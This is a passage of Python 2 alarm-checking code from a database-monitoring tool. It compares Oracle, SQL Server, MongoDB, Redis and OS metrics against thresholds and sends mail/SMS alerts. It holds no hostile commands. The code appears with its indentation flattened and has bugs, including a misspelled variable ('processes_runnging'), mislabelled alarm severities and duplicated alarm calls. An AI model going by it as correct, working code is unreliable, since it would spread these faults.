send_mail = func.update_send_mail_status(server_id,db_type,'flashback_space_used',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'flashback_space_used',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'critical','flashback space usage reach %s'%(flashback_space_used),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'flashback_space_used',flashback_space_used,'critical')
elif int(flashback_space_used) >= int(threshold_warning_fb_space):
send_mail = func.update_send_mail_status(server_id,db_type,'flashback_space_used',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'flashback_space_used',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'warning','flashback space usage reach %s'%(flashback_space_used),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('flashback_space',2,host,port,create_time,'flashback_space_used',flashback_space_used,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'flashback space ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('flashback_space',1,host,port,create_time,'flashback_space_used',flashback_space_used,'ok')
if database_role=="PHYSICAL STANDBY":
if int(dg_delay) >= 3600*3 or int(mrp_status) < 1:
if int(dg_delay) >= 3600*3:
send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',dg_delay,'warning','replication delay more than 3 hours',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl_delay',3,host,port,create_time,'repl_delay',dg_delay,'warning')
if int(mrp_status) < 1:
send_mail = func.update_send_mail_status(server_id,db_type,'mrp_status',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'mrp_status',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'mrp_status',mrp_status,'warning','MRP process is down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',2,host,port,create_time,'mrp_status',mrp_status,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl',mrp_status,'replication ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl_delay',dg_delay,'replication delay ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('repl',1,host,port,create_time,'repl',mrp_status,'ok')
func.update_db_status('repl_delay',1,host,port,create_time,'repl_delay',dg_delay,'ok')
else:
pass
def get_alarm_sqlserver_status():
sql="select a.server_id,a.connect,a.processes,a.processes_running,a.processes_waits,a.create_time,a.host,a.port,b.alarm_processes,b.alarm_processes_running,alarm_processes_waits,b.threshold_warning_processes,b.threshold_warning_processes_running,b.threshold_warning_processes_waits,b.threshold_critical_processes,threshold_critical_processes_running,threshold_critical_processes_waits,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'sqlserver' as db_type from sqlserver_status a, db_cfg_sqlserver b where a.server_id=b.id;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
processes=line[2]
processes_running=line[3]
processes_waits=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_processes=line[8]
alarm_processes_running=line[9]
alarm_processes_waits=line[10]
threshold_warning_processes=line[11]
threshold_warning_processes_running=line[12]
threshold_warning_processes_waits=line[13]
threshold_critical_processes=line[14]
threshold_critical_processes_running=line[15]
threshold_critical_processes_waits=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','sqlserver server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','sqlserver server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_processes)==1:
if int(processes)>=int(threshold_critical_processes):
send_mail = func.update_send_mail_status(server_id,db_type,'processes',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes',processes,'critical','too many processes',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'processes',processes,'critical')
elif int(processes)>=int(threshold_warning_processes):
send_mail = func.update_send_mail_status(server_id,db_type,'processes',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes',processes,'warning','too many processes',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'processes',processes,'warning')
else:
func.update_db_status('sessions',1,host,port,create_time,'processes',processes,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes',processes,'processes ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_processes_running)==1:
if int(processes_running)>=int(threshold_critical_processes_running):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_running',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_running',processes_runnging,'critical','too many processes running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'processes_running',processes_running,'critical')
elif int(processes_running)>=int(threshold_warning_processes_running):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_running',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_running',processes_running,'critical','too many processes running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'processes_running',processes_running,'warning')
else:
func.update_db_status('actives',1,host,port,create_time,'processes_running',processes_running,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes_running',processes_running,'processes running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_processes_waits)==1:
if int(processes_waits)>=int(threshold_critical_processes_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'critical','too many processes waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'processes_waits',processes_waits,'critical')
elif int(processes_waits)>=int(threshold_warning_processes_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'warning','too many processes waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'processes_waits',processes_waits,'warning')
else:
func.update_db_status('waits',1,host,port,create_time,'processes_waits',processes_waits,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'processes waits ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
else:
pass
def get_alarm_oracle_tablespace():
sql = """SELECT a.server_id,
a.tablespace_name,
a.total_size,
a.used_size,
CONVERT(a.max_rate, DECIMAL(6,2)) as max_rate,
a.create_time,
b. HOST,
b. PORT,
b.alarm_tablespace,
b.threshold_warning_tablespace,
b.threshold_critical_tablespace,
b.send_mail,
b.send_mail_to_list,
b.send_sms,
b.send_sms_to_list,
b.tags,
'oracle' AS db_type
FROM oracle_tablespace a, db_cfg_oracle b
WHERE a.server_id = b.id
ORDER BY max_rate desc """
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
tablespace_name=line[1]
total_size=line[2]
used_size=line[3]
max_rate=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_tablespace=line[8]
threshold_warning_tablespace=line[9]
threshold_critical_tablespace=line[10]
send_mail=line[11]
send_mail_to_list=line[12]
send_sms=line[13]
send_sms_to_list=line[14]
tags=line[15]
db_type=line[16]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_tablespace)==1:
if int(max_rate) >= int(threshold_critical_tablespace):
send_mail = func.update_send_mail_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'tablespace(%s)' %(tablespace_name),max_rate,'critical','tablespace %s usage reach %s' %(tablespace_name,max_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('tablespace',3,host,port,create_time,'tablespace(%s)' %(tablespace_name),max_rate,'critical')
elif int(max_rate) >= int(threshold_warning_tablespace):
send_mail = func.update_send_mail_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'tablespace(%s)' %(tablespace_name),max_rate,'warning','tablespace %s usage reach %s' %(tablespace_name,max_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('tablespace',2,host,port,create_time,'tablespace(%s)' %(tablespace_name),max_rate,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'tablespace(%s)' %(tablespace_name),max_rate,'tablespace %s usage ok' %(tablespace_name),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('tablespace',1,host,port,create_time,'tablespace','max(%s:%s)' %(tablespace_name,max_rate),'ok')
else:
pass
def get_alarm_oracle_diskgroup():
sql = """SELECT a.server_id,
a.diskgroup_name,
a.total_mb,
a.free_mb,
CONVERT(a.used_rate, DECIMAL(5,2)) as used_rate,
a.create_time,
b.HOST,
b.PORT,
b.alarm_asm_space,
b.threshold_warning_asm_space,
b.threshold_critical_asm_space,
b.send_mail,
b.send_mail_to_list,
b.send_sms,
b.send_sms_to_list,
b.tags,
'oracle' AS db_type
FROM oracle_diskgroup a, db_cfg_oracle b
WHERE a.server_id = b.id
and CONVERT(a.used_rate, DECIMAL(5,2)) >= b.threshold_warning_asm_space
ORDER BY used_rate desc """
result=func.mysql_query(sql)
if result <> 0:
for line in result:
#print "diskgroup_name: %s" %(line[1])
server_id=line[0]
diskgroup_name=line[1]
total_mb=line[2]
free_mb=line[3]
used_rate=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_asm_space=line[8]
threshold_warning_asm_space=line[9]
threshold_critical_asm_space=line[10]
send_mail=line[11]
send_mail_to_list=line[12]
send_sms=line[13]
send_sms_to_list=line[14]
tags=line[15]
db_type=line[16]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_asm_space)==1:
if int(used_rate) >= int(threshold_critical_asm_space):
send_mail = func.update_send_mail_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'critical','diskgroup %s usage reach %s' %(diskgroup_name,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('diskgroup',3,host,port,create_time,'diskgroup(%s)' %(diskgroup_name),used_rate,'critical')
elif int(used_rate) >= int(threshold_warning_asm_space):
send_mail = func.update_send_mail_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'warning','diskgroup %s usage reach %s' %(diskgroup_name,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('diskgroup',2,host,port,create_time,'diskgroup(%s)' %(diskgroup_name),used_rate,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'tablespace %s usage ok' %(diskgroup_name),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('diskgroup',1,host,port,create_time,'diskgroup','max(%s:%s)' %(diskgroup_name,used_rate),'ok')
else:
pass
def get_alarm_mongodb_status():
sql = "select a.server_id,a.connect,a.connections_current,a.globalLock_activeClients,a.globalLock_currentQueue,a.create_time,b.host,b.port,b.alarm_connections_current,b.alarm_active_clients,b.alarm_current_queue,b.threshold_warning_connections_current,b.threshold_critical_connections_current,b.threshold_warning_active_clients,b.threshold_critical_active_clients,b.threshold_warning_current_queue,b.threshold_critical_current_queue,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mongodb' as db_type from mongodb_status a, db_cfg_mongodb b where a.server_id=b.id;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
connections_current=line[2]
globalLock_activeClients=line[3]
globalLock_currentQueue=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_connections_current=line[8]
alarm_active_clients=line[9]
alarm_current_queue=line[10]
threshold_warning_connections_current=line[11]
threshold_critical_connections_current=line[12]
threshold_warning_active_clients=line[13]
threshold_critical_active_clients=line[14]
threshold_warning_current_queue=line[15]
threshold_critical_current_queue=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','mongodb server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','mongodb server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_connections_current)==1:
if int(connections_current) >= int(threshold_critical_connections_current):
send_mail = func.update_send_mail_status(server_id,db_type,'connections_current',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connections_current',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'critical','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'connections_current',connections_current,'critical')
elif int(connections_current) >= int(threshold_warning_connections_current):
send_mail = func.update_send_mail_status(server_id,db_type,'connections_current',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connections_current',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'critical','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'warning','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'connections_current',connections_current,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'connections current ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',1,host,port,create_time,'connections_current',connections_current,'ok')
if int(alarm_active_clients)==1:
if int(globalLock_activeClients) >= int(threshold_critical_active_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'active_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'active_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'critical','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'critical','too many active clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'active_clients',globalLock_activeClients,'critical')
elif int(globalLock_activeClients) >= int(threshold_warning_active_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'active_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'active_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'warning','too many active clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'active_clients',globalLock_activeClients,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'active clients ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',1,host,port,create_time,'active_clients',globalLock_activeClients,'ok')
if int(alarm_current_queue)==1:
if int(globalLock_currentQueue) >= int(threshold_critical_current_queue):
send_mail = func.update_send_mail_status(server_id,db_type,'current_queue',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'current_queue',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'critical','too many current queue',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'current_queue',globalLock_currentQueue,'critical')
elif int(globalLock_currentQueue) >= int(threshold_warning_current_queue):
send_mail = func.update_send_mail_status(server_id,db_type,'current_queue',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'current_queue',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'warning','too many current queue',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'current_queue',globalLock_currentQueue,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'current queue ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',1,host,port,create_time,'current_queue',globalLock_currentQueue,'ok')
else:
pass
def get_alarm_redis_status():
sql = "select a.server_id,a.connect,a.connected_clients,a.current_commands_processed,a.blocked_clients,a.create_time,b.host,b.port,b.alarm_connected_clients,b.alarm_command_processed,b.alarm_blocked_clients,b.threshold_warning_connected_clients,b.threshold_critical_connected_clients,b.threshold_warning_command_processed,b.threshold_critical_command_processed,b.threshold_warning_blocked_clients,b.threshold_critical_blocked_clients,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'redis' as db_type from redis_status a, db_cfg_redis b where a.server_id=b.id ;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
connected_clients=line[2]
current_commands_processed=line[3]
blocked_clients=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_connected_clients=line[8]
alarm_command_processed=line[9]
alarm_blocked_clients=line[10]
threshold_warning_connected_clients=line[11]
threshold_critical_connected_clients=line[12]
threshold_warning_command_processed=line[13]
threshold_critical_command_processed=line[14]
threshold_warning_blocked_clients=line[15]
threshold_critical_blocked_clients=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','redis server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','redis server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_connected_clients)==1:
if int(connected_clients) >= int(threshold_critical_connected_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'connected_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connected_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connected_clients',connected_clients,'critical','too many connected clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'connected_clients',connected_clients,'critical')
elif int(connected_clients) >= int(threshold_warning_connected_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'connected_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connected_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connected_clients',connected_clients,'warning','too many connected clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'connected_clients',connected_clients,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connected_clients',connected_clients,'connected clients ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',1,host,port,create_time,'connected_clients',connected_clients,'ok')
if int(alarm_command_processed)==1:
if int(current_commands_processed) >= int(threshold_critical_command_processed):
send_mail = func.update_send_mail_status(server_id,db_type,'command_processed',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'command_processed',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'command_processed',current_commands_processed,'critical','too many command processed',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'command_processed',current_commands_processed,'critical')
elif int(current_commands_processed) >= int(threshold_warning_command_processed):
send_mail = func.update_send_mail_status(server_id,db_type,'command_processed',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'command_processed',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'command_processed',current_commands_processed,'warning','too many command processed',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'command_processed',current_commands_processed,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'command_processed',current_commands_processed,'command processed ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',1,host,port,create_time,'command_processed',current_commands_processed,'ok')
if int(alarm_blocked_clients)==1:
if int(blocked_clients) >= int(threshold_critical_blocked_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'blocked_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'blocked_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'blocked_clients',blocked_clients,'critical','too many blocked clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'blocked_clients',blocked_clients,'critical')
elif int(blocked_clients) >= int(threshold_warning_blocked_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'blocked_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'blocked_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'blocked_clients',blocked_clients,'warning','too many blocked clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'blocked_clients',blocked_clients,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'blocked_clients',blocked_clients,'blocked clients ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',1,host,port,create_time,'blocked_clients',blocked_clients,'ok')
else:
pass
def get_alarm_os_status():
sql = "select a.ip,a.hostname,a.snmp,a.process,a.load_1,a.cpu_idle_time,a.mem_usage_rate,a.create_time,b.tags,b.alarm_os_process,b.alarm_os_load,b.alarm_os_cpu,b.alarm_os_memory,b.threshold_warning_os_process,b.threshold_critical_os_process,b.threshold_warning_os_load,b.threshold_critical_os_load,b.threshold_warning_os_cpu,b.threshold_critical_os_cpu,b.threshold_warning_os_memory,b.threshold_critical_os_memory,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_status a,db_cfg_os b where a.ip=b.host"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
host=line[0]
hostname=line[1]
snmp=line[2]
process=line[3]
load_1=line[4]
cpu_idle=line[5]
memory_usage=line[6]
create_time=line[7]
tags=line[8]
alarm_os_process=line[9]
alarm_os_load=line[10]
alarm_os_cpu=line[11]
alarm_os_memory=line[12]
threshold_warning_os_process=line[13]
threshold_critical_os_process=line[14]
threshold_warning_os_load=line[15]
threshold_critical_os_load=line[16]
threshold_warning_os_cpu=line[17]
threshold_critical_os_cpu=line[18]
threshold_warning_os_memory=line[19]
threshold_critical_os_memory=line[20]
send_mail=line[21]
send_mail_to_list=line[22]
send_sms=line[23]
send_sms_to_list=line[24]
server_id=0
tags=tags
db_type="os"
port=''
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if snmp <> 1:
send_mail = func.update_send_mail_status(host,db_type,'snmp_server',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'snmp_server',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'snmp_server','down','critical','snmp server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('snmp','3',host,'',create_time,'snmp_server','down','critical')
func.update_db_status('process','-1',host,'','','','','')
func.update_db_status('load_1','-1',host,'','','','','')
func.update_db_status('cpu','-1',host,'','','','','')
func.update_db_status('memory','-1',host,'','','','','')
func.update_db_status('network','-1',host,'','','','','')
func.update_db_status('disk','-1',host,'','','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'snmp_server','up','snmp server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('snmp',1,host,'',create_time,'snmp_server','up','ok')
if int(alarm_os_process)==1:
if int(process) >= int(threshold_critical_os_process):
send_mail = func.update_send_mail_status(host,db_type,'process',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'process',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'process',process,'critical','too more process running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('process',3,host,'',create_time,'process',process,'critical')
elif int(process) >= int(threshold_warning_os_process):
send_mail = func.update_send_mail_status(host,db_type,'process',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'process',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'process',process,'warning','too more process running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('process',2,host,'',create_time,'process',process,'warning')
else:
func.update_db_status('process',1,host,'',create_time,'process',process,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'process',process,'process running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_os_load)==1:
if int(load_1) >= int(threshold_critical_os_load):
send_mail = func.update_send_mail_status(host,db_type,'load',send_mail,send_mail_max_count)
